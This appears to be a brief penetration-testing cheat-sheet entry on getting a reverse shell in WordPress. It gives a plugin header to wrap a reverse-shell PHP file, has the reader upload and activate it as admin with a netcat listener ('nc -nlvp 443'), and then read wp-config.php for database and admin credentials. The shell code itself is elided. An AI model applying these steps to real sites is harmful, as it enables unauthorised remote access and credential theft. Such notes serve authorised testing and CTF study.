WordPress

WP plugin shell

Modify rev.php to add the following header and zip, upload plugin as wp admin then activate

(with nc listening)

<?php
/**
* Plugin Name: Reverse Shell Plugin2
* Plugin URI:
* Description: Reverse Shell Plugin2
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/

...
circle-info

nc -nlvp 443?

Check /var/www/html/wp-config.php for credentials

MySQL DB creds & WP User/Admin creds

Last updated